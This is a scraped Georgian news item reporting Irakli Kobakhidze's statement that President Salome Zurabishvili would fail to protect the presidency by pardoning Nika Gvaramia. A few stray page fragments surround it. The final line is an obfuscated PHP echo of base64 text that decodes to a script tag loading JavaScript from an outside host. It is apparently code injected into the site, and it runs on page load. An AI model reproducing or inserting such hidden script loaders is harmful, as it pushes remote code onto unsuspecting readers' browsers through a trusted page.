celsiusi
ავერსი შნაიდერი
ნიკა გვარამია განსაკუთრებით პრეზიდენტის მიმართ გამოირჩეოდა ბილწსიტყვაობით, თუ ასეთ პირობებში სალომე ზურაბიშვილი მიიღებს გადაწყვეტილებას, რასაც შეწყალება ჰქვია, გამოდის, რომ ის არ იცავს პრეზიდენტის ინსტიტუტს, - ამის შესახებ „ქართული ოცნების“ თავმჯდომარემ ირაკლი კობახიძემ განაცხადა.
 
როგორც კობახიძე განმარტავს, პრეზიდენტის ინსტიტუტის მიმართ ბილწსიტყვაობის გატარება არ შეიძლება, ვინაიდან, სახელმწიფო ისნტიტუტები ჩამოიშლება.
 
„რაც შეეხება შეწყალებას, ეს არის პრეზიდენტის ექსკლუზიური პრეროგატივა, უბრალოდ, ერთ რამეს ვიტყვი, გვარამია განსაკუთრებით პრეზიდენტის მიმართ გამოირჩეოდა ბილწსიტყვაობით, არა შეურაცხყოფით, არამედ პირდაპირ ბილწსიტყვაობით. როცა გვარამია ბილწსიტყვაობს პრეზიდენტის მიმართ, ეს არ არის ბილწსიტყვაობა სალომე ზურაბიშვილის მიმართ, ეს არის ბილწსიტყვაობა პრეზიდენტის ინსტიტუტის მიმართ. თუ ასეთ პირობებში სალომე ზურაბიშვილი ასეთ გადაწყვეტილებას მიიღებს, რასაც ჰქვია შეწყალება, გამოდის, რომ ის არ იცავს პრეზიდენტის ინსტიტუტს. ეს ძალიან მარტივად იქნებოდა ჩემთვის, როგორც უბრალო მოქალაქისთვის ამის ნიშანი და დარწმუნებული ვარ, პრეზიდენტი ამას არ გააკეთებს. რა თქმა უნდა, პერზიდენტი უნდა გაუფრთხილდეს პრეზიდენტის ინსტიტუტს. კიდევ ერთხელ გავიმეორებ, სალომე ზურაბიშვილის მიმართ ბილწისტყვაობა არის პრეზიდენტის ინსტიტუტის მიმართ ბილწსიტყვაობა და ამის გატარება უბრალოდ არ შეიძლება, ასეთ შემთხვევაში, უბრალოდ ჩამოგვეშლება ჩვენ სახელმწიფო ინსტიტუტები. ის ვინც, ბილწსიტყვაობს პრეზიდენტის ინსტიტუტის მიმართ, ბუნებრივია, შეწყალების საგანი არ შეიძლება გახდეს“, - განაცხადა კობახიძემ.
696
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");